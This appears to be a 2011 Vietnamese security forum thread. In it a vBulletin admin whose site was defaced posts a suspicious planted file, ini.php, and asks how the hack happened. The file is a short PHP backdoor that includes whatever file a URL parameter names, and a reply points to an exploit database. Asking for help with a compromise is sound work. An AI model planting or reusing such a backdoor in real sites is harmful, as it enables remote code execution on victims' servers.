English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Bị thay đổi file forum.php trong vbb  XML
  [Question]   Bị thay đổi file forum.php trong vbb 11/05/2011 19:03:45 (+0700) | #1 | 236973
truyennxt
Member
[Minus]    0    [Plus]
Joined: 18/09/2010 07:51:36
Messages: 17
Offline
[Profile] [PM]
Hôm nay em có truy cập vào diễn đàn thì file forum.php đã bị thay đổi hoàn toàn. Nó chỉ có vài dòng lệnh để hiển thị video, em biết là đã bị hack nên vội vào host để sửa file thì thấy file ini.php (trước đây chưa từng có)

Nội dung của file đó như sau:

Code:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>


Vậy em mong muốn được biết là forum đã bị hack như thế nào, do lỗi gì và cách bảo mật cho tốt. Xin cảm ơn!
[Up] [Print Copy]
  [Question]   Bị thay đổi file forum.php trong vbb 11/05/2011 22:10:44 (+0700) | #2 | 236981
[Avatar]
 RainbowMCVT2561
Member
[Minus]    0    [Plus]
Joined: 19/01/2010 19:18:30
Messages: 22
Offline
[Profile] [PM]
smilie mình cũng mới biết..mấy cái forum mình cũng bị smilie ngoài ra còn bị ifarme chatbox nữa
nghe chừng thì mấy bác nhà nghề làm theo ở đây: http://www.exploit-db.com/ smilie smilie nhìn cũng thoáng ra 1 chút ván đề
Đời còn dài ...Tương lai còn khốn nạn
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|